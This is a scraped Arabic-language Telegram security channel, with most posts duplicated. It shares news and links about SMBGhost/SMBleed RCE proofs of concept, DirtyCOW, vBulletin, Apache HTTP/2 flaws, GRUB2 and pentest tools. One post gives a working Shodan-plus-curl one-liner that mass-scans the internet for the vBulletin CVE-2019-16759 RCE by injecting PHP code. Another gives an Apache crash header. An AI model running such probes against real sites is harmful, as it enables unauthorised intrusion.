Forwarded from Project Sigma - Programming (Plus Ultra)
TheLinuxCommandLine.pdf
2 MB
هذا الكتاب يعد دليلا مثاليا لكل من يريد البدء بتعلم واتقان سطر أوامر لينكس
الكتاب من تأليف:William E. Shotts Jr.
عدد صفحات الكتاب:480.
اللغة: الانجليزية
الكتاب من تأليف:William E. Shotts Jr.
عدد صفحات الكتاب:480.
اللغة: الانجليزية
⚠️ SMBleed
ثغرة أمنية حديثة في بروتوكول SMBv3 لنظام ويندوز من اكتشاف الفريق الأمني ZecOps
CVE-2020-1206
تسمح بتسريب محتوى ذاكرة الكيرنال عن بعد Remotely
وعند ربطها مع ثغرة SMBGhost ( CVE-2020-0796 ) السابقة يمكن تنفيذ أوامر خارجية على النظام RCE
كود الاستغلال ( ربط الثغرتين RCE ) :
https://github.com/ZecOps/CVE-2020-0796-RCE-POC
كود استغلال آخر
https://github.com/chompie1337/SMBGhost_RCE_PoC
#smb #smbleed #smbghost
#windows #RCE #wormable #POC
ثغرة أمنية حديثة في بروتوكول SMBv3 لنظام ويندوز من اكتشاف الفريق الأمني ZecOps
CVE-2020-1206
تسمح بتسريب محتوى ذاكرة الكيرنال عن بعد Remotely
وعند ربطها مع ثغرة SMBGhost ( CVE-2020-0796 ) السابقة يمكن تنفيذ أوامر خارجية على النظام RCE
كود الاستغلال ( ربط الثغرتين RCE ) :
https://github.com/ZecOps/CVE-2020-0796-RCE-POC
كود استغلال آخر
https://github.com/chompie1337/SMBGhost_RCE_PoC
#smb #smbleed #smbghost
#windows #RCE #wormable #POC
This media is not supported in your browser
VIEW IN TELEGRAM
فيديو إثبات POC تم فيه استغلال الثغرتين السابقتين وإتمام RCE وفتح اتصال عكسي على نظام ويندوز 10
Forwarded from Anonymous IRAQIS
AndroBugs
~~~~~~~~
اداة تقوم بتحليل تطبيقات الاندرويد (apk) للعثور على ثغرات امنية فيها
يساعد مطورين التطبيقات او الهكر في اكتشاف الثغرات
المميزات :
- بحث عن الثغرات في تطبيق Android
- التحقق من برمجة التطبيق اذا تفتقد لشيء معين
- التحقق من اوامر shell الخطيرة مثل su
- جمع معلومات من ملايين التطبيقات
- تحقق من الحماية الامنية للتطبيق
الرابط من github :
https://github.com/AndroBugs/AndroBugs_Framework
-
اداة تقوم بتحليل تطبيقات الاندرويد (apk) للعثور على ثغرات امنية فيها
يساعد مطورين التطبيقات او الهكر في اكتشاف الثغرات
المميزات :
- بحث عن الثغرات في تطبيق Android
- التحقق من برمجة التطبيق اذا تفتقد لشيء معين
- التحقق من اوامر shell الخطيرة مثل su
- جمع معلومات من ملايين التطبيقات
- تحقق من الحماية الامنية للتطبيق
الرابط من github :
https://github.com/AndroBugs/AndroBugs_Framework
-
Forwarded from Anonymous IRAQIS
This media is not supported in your browser
VIEW IN TELEGRAM
طريقة جميلة للهندسة الاجتماعية صح؟ 😂
⚠️ اكتشاف عدة ثغرات أمنية ببروتوكول GTP الخاص بشبكة المحمول والانترنت
لشبكات 2G/3G/4G/5G
تسمح بـ :
🔸 التجسس على بيانات المستخدمين
🔸 انتحال الشخصية
🔸تساعد في عمليات الاحتيال
🔸 هجمات DoS
التفاصيل :
https://thehackernews.com/2020/06/mobile-internet-hacking.html
لشبكات 2G/3G/4G/5G
تسمح بـ :
🔸 التجسس على بيانات المستخدمين
🔸 انتحال الشخصية
🔸تساعد في عمليات الاحتيال
🔸 هجمات DoS
التفاصيل :
https://thehackernews.com/2020/06/mobile-internet-hacking.html
⚙https://github.com/future-architect/vuls
اداة مفتوحة المصدر لأنظمة Linux/FreeBSD لفحص واكتشاف الثغرات الأمنية للبرامج المثبتة على النظام
تعتمد على عدة قواعد بيانات
NVD
JVN
OVAL
RHSA/ALAS/ELSA/FreeBSD-SA.
#tools #scanner #vulnerability #Linux #FreeBSD #open_source
#ProjectSigma
اداة مفتوحة المصدر لأنظمة Linux/FreeBSD لفحص واكتشاف الثغرات الأمنية للبرامج المثبتة على النظام
تعتمد على عدة قواعد بيانات
NVD
JVN
OVAL
RHSA/ALAS/ELSA/FreeBSD-SA.
#tools #scanner #vulnerability #Linux #FreeBSD #open_source
#ProjectSigma
GitHub
GitHub - future-architect/vuls: Agent-less vulnerability scanner for Linux, FreeBSD, Container, WordPress, Programming language…
Agent-less vulnerability scanner for Linux, FreeBSD, Container, WordPress, Programming language libraries, Network devices - future-architect/vuls
⚠️ اكتشاف ثغرة أمنية جديدة في GRUB2 bootloader
تسمح بتخطي ال secure boot كما يمكن استغلالها للحصول على تثبيت دائم للوصول إلى جهاز الضحية persistence
* مليارات الأجهزة حول العالم مصابة * والتي تستخدم توزيعات لينكس أو أنظمة ويندوز ( تعتمد على grub bootloader )
التفاصيل :
https://thehackernews.com/2020/07/grub2-bootloader-vulnerability.html
#grub #persistence #vulnerability #bypass #secure_boot
تسمح بتخطي ال secure boot كما يمكن استغلالها للحصول على تثبيت دائم للوصول إلى جهاز الضحية persistence
* مليارات الأجهزة حول العالم مصابة * والتي تستخدم توزيعات لينكس أو أنظمة ويندوز ( تعتمد على grub bootloader )
التفاصيل :
https://thehackernews.com/2020/07/grub2-bootloader-vulnerability.html
#grub #persistence #vulnerability #bypass #secure_boot
📂 كورسات متنوعة بحجم 36 غيغابايت ( أمن معلومات - شبكات - برمجة ...... )
منوعة بين فيديوهات وكتب
* الرابط :
https://mega.nz/folder/DFpzEJDT#awRHvUL19q1FDfR80xeXrw
#courses #security #networking #programming
#project_sigma
منوعة بين فيديوهات وكتب
* الرابط :
https://mega.nz/folder/DFpzEJDT#awRHvUL19q1FDfR80xeXrw
#courses #security #networking #programming
#project_sigma
rpcbind pentesting / enumeration [ port 111 ]
مقال يشرح طرق الاستفادة من المنفذ 111 rpcbind في جمع المعلومات عن الهدف وربما تحميل ورفع الملفات في بعض الحالات وبعض الاستغلالات الأخرى ..
https://book.hacktricks.xyz/pentesting/pentesting-rpcbind
#rpcbind #enumeration #port_111
#project_sigma
مقال يشرح طرق الاستفادة من المنفذ 111 rpcbind في جمع المعلومات عن الهدف وربما تحميل ورفع الملفات في بعض الحالات وبعض الاستغلالات الأخرى ..
https://book.hacktricks.xyz/pentesting/pentesting-rpcbind
#rpcbind #enumeration #port_111
#project_sigma
⚠️ vbulletin 0-day RCE
ثغرة vbulletin القديمة تعود من جديد ..
تحدثنا سابقاً عن ثغرة RCE في سكربت المنتديات الشهير vbulletin
CVE-2019-16759
والتي تم اكتشافها العام الماضي ونشر استغلال لها من قبل باحث مجهول ..
قامت الشركة بإصدار ترقيعات لها بعد فترة ..
حالياً تمكن باحث من إيجاد طريقة جديدة لتخطي الترقيع الأمني للثغرة وتنفيذ أوامر على النظام
- التفاصيل :
https://thehackernews.com/2020/08/vBulletin-vulnerability-exploit.html
- الاستغلال :
https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
- أمر لإيجاد مواقع مصابة بالاعتماد على محرك البحث shodan :
#project_sigma
ثغرة vbulletin القديمة تعود من جديد ..
تحدثنا سابقاً عن ثغرة RCE في سكربت المنتديات الشهير vbulletin
CVE-2019-16759
والتي تم اكتشافها العام الماضي ونشر استغلال لها من قبل باحث مجهول ..
قامت الشركة بإصدار ترقيعات لها بعد فترة ..
حالياً تمكن باحث من إيجاد طريقة جديدة لتخطي الترقيع الأمني للثغرة وتنفيذ أوامر على النظام
- التفاصيل :
https://thehackernews.com/2020/08/vBulletin-vulnerability-exploit.html
- الاستغلال :
https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
- أمر لإيجاد مواقع مصابة بالاعتماد على محرك البحث shodan :
shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done;
#vbulletin #RCE #webapp #poc #exploit #0day#project_sigma
The Hacker News
[Unpatched] Critical 0-Day RCE Exploit for vBulletin Forum Disclosed Publicly
An anonymous hacker today publicly revealed details and proof-of-concept exploit code for an unpatched, critical zero-day remote code execution vulnerability in vBulletin.
▫️ DirtyCOW
ثغرة [ قديمة ] في كيرنال نظام لينكس linux kernel
( privilege escalation )
Race Condition COW ( copy-on-write )
فيديو رائع يشرح مبدأ الثغرة بالتفصيل
https://www.youtube.com/watch?v=kEsshExn7aE
* الاستغلال موجود على exploit-db بعدة إصدارات *
#root #privilege_escalation #DirtyCOW #race_condition
#project_sigma
ثغرة [ قديمة ] في كيرنال نظام لينكس linux kernel
( privilege escalation )
Race Condition COW ( copy-on-write )
فيديو رائع يشرح مبدأ الثغرة بالتفصيل
https://www.youtube.com/watch?v=kEsshExn7aE
* الاستغلال موجود على exploit-db بعدة إصدارات *
#root #privilege_escalation #DirtyCOW #race_condition
#project_sigma
Project Sigma - Advanced PT
▫️ DirtyCOW ثغرة [ قديمة ] في كيرنال نظام لينكس linux kernel ( privilege escalation ) Race Condition COW ( copy-on-write ) فيديو رائع يشرح مبدأ الثغرة بالتفصيل https://www.youtube.com/watch?v=kEsshExn7aE * الاستغلال موجود على exploit-db بعدة إصدارات…
مجموعة من الاستغلالات تعتمد على نفس المبدأ ولكن باستراتيجيات مختلفة
وطرق مختلفة للاستفادة من الاستغلال
https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
وطرق مختلفة للاستفادة من الاستغلال
https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
GitHub
PoCs
Dirty COW. Contribute to dirtycow/dirtycow.github.io development by creating an account on GitHub.
Forwarded from BLACK SHADOW (ȘħλɖΘώ)
The Basics of Exploit Development:
1. Win32 Buffer Overflows
https://www.coalfire.com/The-Coalfire-Blog/January-2020/The-Basics-of-Exploit-Development-1
2. SEH Overflows
https://www.coalfire.com/The-Coalfire-Blog/March-2020/The-Basics-of-Exploit-Development-2-SEH-Overflows
3. Egg Hunters
https://www.coalfire.com/The-Coalfire-Blog/May-2020/The-Basics-of-Exploit-Development-3-Egg-Hunters
1. Win32 Buffer Overflows
https://www.coalfire.com/The-Coalfire-Blog/January-2020/The-Basics-of-Exploit-Development-1
2. SEH Overflows
https://www.coalfire.com/The-Coalfire-Blog/March-2020/The-Basics-of-Exploit-Development-2-SEH-Overflows
3. Egg Hunters
https://www.coalfire.com/The-Coalfire-Blog/May-2020/The-Basics-of-Exploit-Development-3-Egg-Hunters
Coalfire
Coalfire Blog
Resource covering the most important issues in IT security and compliance as well as insights on IT GRC issues that impact the industries that we serve.
⚠️ Apache http server multiple vulnerabilities
باحث من الفريق الأمني الخاص بغوغل يكشف 3 ثغرات أمنية في سيرفر أباتشي .. تتنوع بين Denial of Service
و memory corruption
و RCE محتمل
CVEs :
CVE-2020-9490
CVE-2020-11984
CVE-2020-11993
Proof-of-Concept :
قام الباحث مكتشف الثغرة بنشر كود إثبات يسبب memory corruption + crash لسيرفر apache مصاب ( والذي يحوي HTTP/2 module )
وذلك بإرسال http header محدد يضم قيمة معينة وهو
Cache-Digest: EA9BQQ==
" الملف في المنشور التالي "
https://thehackernews.com/2020/08/apache-webserver-security.html
#apache #DOS #http #poc #memory_corruption
#Project_Sigma
باحث من الفريق الأمني الخاص بغوغل يكشف 3 ثغرات أمنية في سيرفر أباتشي .. تتنوع بين Denial of Service
و memory corruption
و RCE محتمل
CVEs :
CVE-2020-9490
CVE-2020-11984
CVE-2020-11993
Proof-of-Concept :
قام الباحث مكتشف الثغرة بنشر كود إثبات يسبب memory corruption + crash لسيرفر apache مصاب ( والذي يحوي HTTP/2 module )
وذلك بإرسال http header محدد يضم قيمة معينة وهو
Cache-Digest: EA9BQQ==
" الملف في المنشور التالي "
https://thehackernews.com/2020/08/apache-webserver-security.html
#apache #DOS #http #poc #memory_corruption
#Project_Sigma
apache_poc.py
434 B
Apache DOS PoC
اضغط زر Enter ل 70 ثانية للحصول على صلاحيات روت على نظام لينكس :)
الثغرة قديمة من 2016
http://securityaffairs.co/wordpress/53494/breaking-news/cve-2016-4484-linux.html
الثغرة قديمة من 2016
http://securityaffairs.co/wordpress/53494/breaking-news/cve-2016-4484-linux.html
Security Affairs
CVE-2016-4484 Hold down the Enter key for 70s to gain a Linux Root shell
The CVE-2016-4484 vulnerability can be exploited to gain a Linux Root shell by simply pressing the Enter Key for 70 Seconds.
⚠️ Raccoon attack ..
ثغرة أمنية جديدة تمكن من كسر تشفير SSL/TLS وقراءة بيانات حساسة
( الثغرة server-side وليست client-side )
التفاصيل
https://thehackernews.com/2020/09/raccoon-ssl-tls-encryption.html
#SSL #TLS #side_channel #Raccoon
#Project_Sigma
ثغرة أمنية جديدة تمكن من كسر تشفير SSL/TLS وقراءة بيانات حساسة
( الثغرة server-side وليست client-side )
التفاصيل
https://thehackernews.com/2020/09/raccoon-ssl-tls-encryption.html
#SSL #TLS #side_channel #Raccoon
#Project_Sigma